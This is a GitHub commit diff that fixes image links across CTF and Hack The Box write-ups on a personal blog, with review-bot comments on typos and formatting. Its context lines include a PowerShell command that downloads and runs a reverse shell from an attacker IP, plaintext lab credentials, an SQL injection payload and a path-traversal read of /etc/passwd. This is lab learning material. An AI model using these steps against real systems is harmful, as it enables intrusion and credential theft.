Commit

FIX: fix links to images
therokdaba committed May 23, 2023
1 parent 775ae0f commit 21bd0d8
Showing 28 changed files with 26 additions and 20 deletions.
2 changes: 1 addition & 1 deletion _posts/2021-04-16-THM-Metasploit.md
Expand Up @@ -84,7 +84,7 @@

Metasploit consists of six modules:

![THM%20Metasploit/module_diagram.png](THM%20Metasploit/module_diagram.png)
![THM%20Metasploit/module_diagram.png](/images/THM%20Metasploit/module_diagram.png)

*Note, this diagram includes both the interfaces and *most* of the modules. This diagram does not include the 'Post' module.*

20 changes: 10 additions & 10 deletions _posts/2021-06-05-HTB-Archetype.md
Expand Up @@ -4,39 +4,39 @@ I've been wanting to get into Hack The Box for a while now. The first machine I'

The first thing we are going to do is an initial Nmap scan with the tags : `-sC` (to tell Nmap to use it's default scripts), `-sV` (to get more information about the services running on the different ports of the machine) and using `-oN` we save the scan in a file. We get the following output:

![Archetype/nmap_initial.png](Archetype/nmap_initial.png)
![Archetype/nmap_initial.png](/images/Archetype/nmap_initial.png)

Okay, so we can identify this box as a Windows machine and we find out that there is a Microsoft SQL Server running on port `1433` and there is a Samba on port `445`.

We also run a more aggressive (`-A`) Nmap scan on all ports (`-p-`) to get more information. The output is as following:

![Archetype/nmap_all_ports_aggressive.png](Archetype/nmap_all_ports_aggressive.png)
![Archetype/nmap_all_ports_aggressive.png](/imges/Archetype/nmap_all_ports_aggressive.png)

We don't get any interesting additional information here so let's move to on to enumerating Samba.

The initial nmap scan tells us that we can access Samba using the `guest` account, so we will do just that using `smbmap`. We use `-u` to specify the user and `-H` to specify the host's IP.

![Archetype\smbmap.png](Archetype/smbmap.png)
![Archetype\smbmap.png](/images/Archetype/smbmap.png)

We find out that backups and IPC$ are accessible as read only. So using smbclient we will access the both of them. First let's check out `backups`:

![Archetype/smbclient_backups.png](Archetype/smbclient_backups.png)
![Archetype/smbclient_backups.png](/images/Archetype/smbclient_backups.png)

We find an interesting file here, `prod.dtsConfig`. We download it onto our machine using `get`.

Now let's take a look at `IPC$`:

![Archetype/smbclient_ipc.png](Archetype/smbclient_ipc.png)
![Archetype/smbclient_ipc.png](/images/Archetype/smbclient_ipc.png)

As you can see, we are unable to get any information from `IPC$` so let's take a look at `prod.dtsConfig`'s content.

![Archetype/prod_dtsConfig.png](Archetype/prod_dtsConfig.png)
![Archetype/prod_dtsConfig.png](/images/Archetype/prod_dtsConfig.png)

We find creds here that look to be for the mssql server: `Archetype/sql_svc:M3g4c0rp123` (Note: the format here is `username:password`)

Let's try getting in the MSSQL server using the creds we just found. We will be using an impacket script called `mssqlclient.py`. This script is already on kali linux but can be found [here](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). The full command is: `python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth ARCHETYPE/[email protected]`.

![Archetype/mssql.png](Archetype/mssql.png)
![Archetype/mssql.png](/images/Archetype/mssql.png)

Great, it worked. The first thing we are going to run is `enable_xp_cmdshell` and we will prepare a powershell reverse shell on our machine that we are going to use to access the machine.

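Review bot: the replacement path on the `nmap_all_ports_aggressive.png` line is `/images/` misspelled as `/imges/`, so that link stays broken after this fix; it should read `![Archetype/nmap_all_ports_aggressive.png](/images/Archetype/nmap_all_ports_aggressive.png)`. While this hunk is being touched, the alt text on the smbmap line still uses a backslash (`![Archetype\smbmap.png]`) where every other alt text uses a forward slash; worth making it consistent in the same commit.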
Expand All @@ -49,17 +49,17 @@ We are going to host the reverse shell file using the module `http.server` in py

Now we go back to mssql server and run `xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.217/shell.ps1\");"` to download and execute the reverse shell.

![Archetype/call_revshell.png](Archetype/call_revshell.png)
![Archetype/call_revshell.png](/images/Archetype/call_revshell.png)

Wouhou we get a call back on our attacking machine and we have a reverse shell. Now let's enumerate the machine to find a way to escalate our privileges.

On this machine, we are able to take a look at the command history of powershell and if we run: `type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` we get the administrator's password: `MEGACORP_4dm1n!!`.

![Archetype/history_cmd.png](Archetype/history_cmd.png)
![Archetype/history_cmd.png](/images/Archetype/history_cmd.png)

Okay great now we just have to reconnect to the machine as administrator using another impacket script, `psexec.py`. We run `python3 /usr/share/doc/python3-impacket/examples/psexec.py [email protected]` and *voilà*!

![Archetype/psexec.png](Archetype/psexec.png)
![Archetype/psexec.png](/images/Archetype/psexec.png)

Now we just need to get the flags!

2 changes: 1 addition & 1 deletion _posts/2021-07-16-CTFLearn-Basic-Injection.md
Expand Up @@ -12,7 +12,7 @@ So we already know that we need to use SQL Injection and looking at the challeng

So let's go to this website:

![Basic%20Injection/webpage.png](Basic%20Injection/webpage.png)
![Basic%20Injection/webpage.png](/images/Basic%20Injection/webpage.png)

If we enter `' or 1=1; -- -`, we are able to leak the whole database.

2 changes: 1 addition & 1 deletion _posts/2021-07-16-RingZer0-Big-Brother-Is-Watching.md
Expand Up @@ -4,7 +4,7 @@ This challenge is part of the web section of the RingZer0 CTF and can be found [

The challenge page shows the following:

![Big%20Bro/chall_page.png](Big%20Bro/chall_page.png)
![Big%20Bro/chall_page.png](/images/Big%20Bro/chall_page.png)

There is a reference to Google, this can make you think of Google crawlers and lead you to check the site's `robots.txt` file. In fact, *a robots.txt file is used primarily to manage crawler traffic to your site, and usually to keep a file off Google* (definition found here: [https://developers.google.com/search/docs/advanced/robots/intro](https://developers.google.com/search/docs/advanced/robots/intro)). So the `robots.txt file` could make sure that Google does not find this challenge's flag.

2 changes: 1 addition & 1 deletion _posts/2021-07-16-RingZer0-Headache.md
Expand Up @@ -6,7 +6,7 @@ This time the challenge's info page only says the following: "Answer is closer t

I then decided to open Firefox's Web Developer Tools to see if there was anything more interesting there. I decided to take a look at the requests that were made in the *Network* tab:

![Headache/requests.png](Headache/requests.png)
![Headache/requests.png](/images/Headache/requests.png)

We can see that one of the response's headers of the get request made to access the challenge page is `flag` and its value contains the flag!

4 changes: 2 additions & 2 deletions _posts/2021-07-16-RingZer0-Looking-For-Password-File.md
Expand Up @@ -4,15 +4,15 @@ This challenge is part of the web section of the RingZer0 CTF and can be found [

On a first look, the home section of the webpage of this challenge looks pretty bland:

![Password%20File/webpage.png](Password%20File/webpage.png)
![Password%20File/webpage.png](/images/Password%20File/webpage.png)

However its URL is very interesting: `http://challenges.ringzer0team.com:10075/?page=lorem.php`

We can see a `page` parameter and it seems that it will display the given page. The vulnerability here is LFI (local file inclusion). We will try to display a file on the machine that we should not have access to normally (I'm guessing it's a password file if we trust the challenge's name).

I decided to test this out and passed through `flag.php` (the url now being: `http://challenges.ringzer0team.com:10075/?page=flag.php`) and I got back the following error:

![Password%20File/error.png](Password%20File/error.png)
![Password%20File/error.png](/images/Password%20File/error.png)

We can see that `flag.php` does not exist, however this error also helps us verify that the website is located in `/var/www/html/`. Since the name of the challenge is "Looking for password file", we can guess that the file we are looking for is `/etc/passwd`. So we are going to the following url: `http://challenges.ringzer0team.com:10075/?page=../../../etc/passwd`.

2 changes: 1 addition & 1 deletion _posts/2021-07-16-RingZer0-Words-Mean-Something.md
Expand Up @@ -4,7 +4,7 @@ This challenge is part of the web section of the RingZer0 CTF and can be found [

This challenge's page shows the following:

![Words%20Mean%20Something/chall_page.png](Words%20Mean%20Something/chall_page.png)
![Words%20Mean%20Something/chall_page.png](/images/Words%20Mean%20Something/chall_page.png)

First thing I did was check the site's source page but sadly it didn't give out any flag or any interesting information. So I then took a look at Firefox's Web Developer Tools.

2 changes: 1 addition & 1 deletion _posts/2021-08-02-RTL.md
Expand Up @@ -246,7 +246,7 @@ Where is this? was an OSINT challenge released later in the ctf worth 40 points.

The image is the following:

![*image from the ctf*](Where/where.PNG)
![*image from the ctf*](/images/Where/where.PNG)


If we zoom in on the left, we can kind of make out the words "Zum Padd", I started typing it out on my search bar and was automatically recommended Zum Paddenwirt. I checked it out on Google Maps and found there its coordinates.
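Review bot: the alt text on the changed image line keeps the literal asterisks in `![*image from the ctf*]`; Markdown emphasis is not rendered inside alt text, so the asterisks will show up verbatim in the `alt` attribute. Since the line is being rewritten anyway, dropping them (`![image from the ctf](/images/Where/where.PNG)`) would be cleaner. Also double-check that the renamed file kept the upper-case `.PNG` extension, because the GitHub Pages host is case-sensitive and the link will only resolve if the case matches exactly.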
10 changes: 8 additions & 2 deletions _posts/2023-05-23-HeroCTF-AppointmentBook.md
Expand Up @@ -64,7 +64,7 @@ free(local_28);
And we can find above `appointments`, a bunch of pointers to interesting functions we can overwrite:
![Possible functions we can overwrite](/_drafts/Appointment%20Book/poss_fct_overwrite.png)
![Possible functions we can overwrite](/images/Appointment%20Book/poss_fct_overwrite.png)
So what we need to do is overwrite the pointer to one of these functions so that it points to our win function, and then the next time this function is called, it will instead call our win function giving us a shell.
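Review bot: the new image line sits directly between two prose lines with no blank line before or after it, so in kramdown it is treated as a continuation of the preceding paragraph and the image renders inline rather than as its own block. Since this line is already being edited for the path change, adding a blank line on each side of `![Possible functions we can overwrite](/images/Appointment%20Book/poss_fct_overwrite.png)` would fix the layout at no extra cost.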
Expand Down Expand Up @@ -158,4 +158,10 @@ print(flag)
io.interactive()
```

And the flag is: `Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}`
And the flag is: `Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}`

## Contact

If you have any questions or remarks don't hesitate to reach out on discord to *therokdaba#9872*.

Go back to the [homepage](https://therokdaba.github.io/) of this website.
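Review bot: the removed and added flag lines are byte-identical, so that part of the hunk is only a trailing-newline change, which is fine; but the appended `## Contact` section and homepage link are unrelated to the commit's stated purpose ("fix links to images"). Bundling it here makes the history harder to read and to revert; it belongs in a separate commit with its own message.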
File renamed without changes
